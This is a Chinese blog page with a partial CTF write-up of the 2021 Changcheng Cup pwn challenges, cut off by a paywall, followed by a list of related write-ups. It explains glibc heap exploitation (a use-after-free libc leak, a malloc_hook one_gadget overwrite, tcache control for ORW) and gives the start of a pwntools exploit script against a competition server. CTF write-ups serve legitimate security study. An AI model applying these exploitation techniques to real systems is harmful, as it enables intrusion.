2021长城杯pwn部分wp

最新推荐文章于 2025-09-19 09:07:02 发布
原创 最新推荐文章于 2025-09-19 09:07:02 发布 · 6.9k 阅读 · 3
标签
#ctf
本次比赛中,PWN部分主要涉及基础glibc heap题目。在king_in_heap_1中,利用delete函数的Use-After-Free漏洞获取libc地址,通过realloc调整后执行onegadget。king_in_heap_2则通过未置零的UAF控制TC结构体,泄露内存,最终实现ORW。

前言:

就, 除了vmpwn都是基础glibc的heap题

king_in_heap_1:

delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=remote('47.104.175.110',20066)
#sh=process('./king')
elf=ELF('./king')
libc=elf.libc
context.binary=elf
#context.log_level='debug'

def magic():
    sh.recvuntil(">> \n")
    sh.sendline("666")
    
def add(idx, size):
    sh.recv()
    sh.sendline('1')
    sh.recv()
    sh.sendline(str(idx))
    sh.recv()
    sh.sendline(str(size))

def delete(idx):
    sh.recv()
    sh.sendline('2')
    sh.recv()
    sh.sendline(str(idx))

def edit(idx, content):
    sh.recv()
    sh.sendline("3")
    sh.recv()
    sh.sendline(str(idx))
    sh.recv()
    sh.sendline(content)

def exp():
    magic()
    leak=int(sh.recv(8), 16)
    stdout=leak+0x36fdcd
    log.success("leak: "+hex(leak))
    add(0, 0x6
最低0.47元/天 解锁文章
第一届长城杯初赛部分wp(个人解题思路)
qq_74806534的博客
04-05 3770
访问蚁剑连接访问/var/www/html/u_c4nt_f1nd_flag.php。
第一届“长城杯”信息安全铁人三项(四场)部分题目wp
weixin_67961126的博客
04-02 2236
首先看到流量分析的题目用wireshark,再导出http对象列表在zip对象中发现了files.zip。然后尝试暴力破解没有得到密码想着去分析一下文件用到的winhex。根据题目描述的提示结合之前没用到的key,des解码得到flag。就想着是不是还有别的加密----就想到了去检查一下是不是伪加密。发现这么多==是base64隐写,跑脚本得到。得到了key的值是66666666。是伪加密,改09为00。
2021 长城杯ctf wp
qq_45603443的博客
09-20 5924
2021 长城杯 wpMisc签到你这flag保熟吗Cryptobaby_rsaReverseJust_cmpfunny_jsWebjava_urlez_pythonPwnK1ng_in_h3Ap_IK1ng_in_h3Ap_II Misc 签到 ASCII—16进制—base64 你这flag保熟吗 下载附件,得到两张图⽚和⼀个压缩包,压缩包需要密码 从图⽚可以提取出两个rar 得到⼀个excel和⼀个hint hint中提示base64:(,还有⼀串不知所云的base64 excel中是分开来的单
长城杯线下赛赛后复现
fmyyy1的博客
10-14 1884
长城杯线下赛赛后复现 前言 去打了长城杯决赛,结果全程坐牢,果然不联网的web太难了,赛后拿到了两个web靶机的wp,复现一下。 fancyapi 目录结构 逻辑很简单,web用的是python的flask框架,然后go写了几个接口处理数据。 看看backend.go func Flag(w http.ResponseWriter, r *http.Request ) { action:= r.URL.Query().Get("action") if action == "" { fail(w,
第四届长城杯部分wp
weixin_74427106的博客
09-09 2049
还是太菜了,要经常练了。
2024-CISCN-长城杯铁人三项 初赛
Aluxian_的博客
12-16 1837
【代码】2024-CISCN-长城杯铁人三项 初赛。
2022-长城杯初赛Write up-by EchoSec安全团队
echosec的博客
08-29 2732
EchoSec安全团队参加的首场比赛,在各位师傅们的输出下,也拿到第8名的成绩,虽然不算特别好,也是EchoSec安全团队迈出的第一步。同时欢迎各位有兴趣的师傅加入我们,一起学习进步。可+v:He1l_T4lk。...
2025长城杯线上初赛wp
最新发布
m0_55282610的博客
09-19 931
发现写入内容是"Z.m.x.h.Z.3.t.k.O.T.g.4.Z.W.I.1.Z.m.N.k.Y.T.E.0.O.D.h.m.Y.T.N.k.M.z.A.y.N.G.E.4.N.z.g.w.Y.m.J.j.Z.H.0.=">fffllagg1.txt。所有模型均通过 torch.save(model.state_dict(), path) 保存权重字典,符合目标系统中 model.load_state_dict 的加载要求,确保上传后能被正确解析。# 修改最后一层的偏置,使其总是输出接近0的值。
2025第五届长城杯网络安全大赛初赛 Web方向 WP
WayneJH的博客
09-15 4130
第五届“长城杯”网络安全大赛暨京津冀蒙网络安全技能竞赛初赛 Web方向 题解WP
2024长城杯铁人三项, Python代码分析题crypto WP
xingmiao0的博客
04-02 1375
temp = (x * flag中的每个字符的十进制ascii码值 + y) % 251。
第一届长城杯 部分WP
mumuzi的博客
09-19 3086
平台没交WP,一是19名肯定进不了,二是步骤多懒得写,三是队里的密码????赶高铁去了。 签到 16进制的ascii+base64,手速是吧,直接一血。 flag{Welcome_to_changchengbe1} 你这flag保熟吗 前面不说了,两张图片尾部都有rar,提取出来一个hint和一个password的表格,hint给了16位的base64,加密之后和表格比较,发现 哦~,原来是希尔伯特曲线 观察和写脚本经历了长达1个多小时的斗争。 用希尔伯特曲线来提取此表格的脚本如下。(根据百度) fr
第一届“长城杯”信息安全铁人三项赛初赛(第三赛区)部分题目wp
m0_74426634的博客
04-02 2516
第一届“长城杯”信息安全铁人三项赛初赛(第三赛区)部分题目wp(会持续更新)
2024长城杯-第五场-流量分析wp
qq_67760645的博客
04-11 2694
查看了一下流量包里的协议包,发现只有TLS协议进行了加密。使用冰蝎4.0自带的解密脚本进行解密,协议名称那里根据前面发现的代码判断出是xor+base64。先把这段数据放入冰蝎进行解密,然后把这个cmd变量的这段base64进行解码,发现将这段串数字输入到文件中,文件名带有passwd。得到了flag{Keep_going_jpg},但是这个flag是错误的。但是这个flag里面的内容就是图片的文件名+文件后缀。说明解题还是看这个图片。查看那个key文件,拖入十六进制查看工具发现这个是RSA加密的key。
第一届长城杯半决赛wp和AWD笔记
qq_74806534的博客
04-25 4443
网站备份文件泄露可能造成的危害:1. 网站存在备份文件:网站存在备份文件,例如数据库备份文件、网站源码备份文件等,攻击者利用该信息可以更容易得到网站权限,导致网站被黑。2. 敏感文件泄露是高危漏洞之一,敏感文件包括数据库配置信息,网站后台路径,物理路径泄露等,此漏洞可以帮助攻击者进一步攻击,敞开系统的大门。3. 由于目标备份文件较大(xxx.G),可能存在更多敏感数据泄露4. 该备份文件被下载后,可以被用来做代码审计,进而造成更大的危害。
第五届“长城杯”初赛 2025 Web WP
qq_75192794的博客
09-14 4233
摘要:本文记录了多个CTF解题过程,包括文件上传、目录穿越、符号链接利用等技巧。1. 通过调试模式获取flag;2. 利用tar解压符号链接特性实现文件位置修改,上传webshell;3. PHP文件读取到RCE的CVE-2024-2961漏洞利用,包括下载exp脚本、修改参数实现命令执行。每个题目都详细说明了操作步骤和关键点,展示了从信息收集到最终获取flag的完整过程,涉及多种安全漏洞的实战利用技巧。
长城杯2021政企组-魔鬼凯撒的RC4茶室 WP
Sciurdae的博客
12-29 1270
前面看起来像是RC4加密,结合题目一开始也以为是RC4,实际上并没有发现key。尝试之后,发现下面俩个加密实际都不重要。根据程序后面可以知道,flag片段里面的flag就是密文,拿密文和key异或可以得到前半段flag。有个小技巧,这里传入的参数是Str字符串,但是原本IDA自动识别出来的类型是。,所以直接看就是很多(BYTE *)类型转换,可以直接对a1按。输入1111122222为flag,动态调试。UPX壳,upx -d直接脱。这样就特别容易看了,其他题目同理。正确,也就得到了后半部分flag。
2024-长城杯-wp
m0_73889365的博客
02-18 1310
CTF 比赛wp
2021 BugkuCTF长城杯“ ——“你这flag保熟吗“ 详解
Mutsa的博客
02-21 3281
废话:第一次参加CTF比赛,啥也不会,去刷刷真题吧,刷到21年“长城杯”Misc题--“你这flag保熟吗”。下载解压,两张图片一个压缩包,解压要密码,像这种有压缩包要密码,还有图片或者其他文件的,直接不要去想暴力破解了。将图片分离得到一个passwor.xls和hint.txt。两个都打开了,看不出来啥,直接网上搜WP。好!搜来的题解看了,更加懵了,什么希尔伯特曲线,什么brainfuck(BF)密码,什么BF执行的栈,什么atbash密码。学了好久,记录一下。
2025第五届“长城杯”网络安全大赛暨京津冀蒙网络安全技能竞赛 WP Web全
Python1111111的博客
09-14 1976
本文摘要了三个CTF题解: 文曲签学:通过目录穿越和双写绕过获取flag。 EZ_upload:利用软链接特性,将PHP木马通过tar解压写入目标目录实现RCE。 SeRce:反序列化绕过后,结合/proc/self/maps和libc.so.6文件读取构造payload,最终通过执行readflag获取flag。每个题目均包含详细解题步骤与关键技巧。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值